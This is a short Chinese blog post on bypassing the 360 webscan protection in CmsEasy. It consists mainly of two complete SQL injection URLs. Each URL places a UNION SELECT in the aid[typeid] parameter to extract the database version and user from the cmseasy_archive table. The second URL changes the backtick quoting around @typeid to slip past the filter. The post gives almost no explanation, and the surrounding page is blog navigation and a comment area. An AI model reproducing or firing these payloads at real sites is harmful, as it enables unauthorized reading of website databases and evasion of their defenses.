当前位置: 首页 > 信息安全 > 正文

webscan360防御绕过(select union)

Mr.linus 发表于2015年5月30日 18:08
代码 就不看了 
直接看

今天我们 

发送url:
这是我们上一次的:

http://localhost/CmsEasy_t/uploads/index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECT@`typeid`,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=10

1.png


这次我们稍稍 改动一下:
http://localhost/CmsEasy_t/uploads/index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECT@typeid,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=10

2.png

全文完
本文标签:
本文标题: webscan360防御绕过(select union)
本文链接: http://www.90qj.com/m/?post=145

〓 随机文章推荐

共有5177阅 / 0我要评论
  1. 还没有评论呢,快抢沙发~

发表你的评论吧返回顶部

!评论内容需包含中文


请勾选本项再提交评论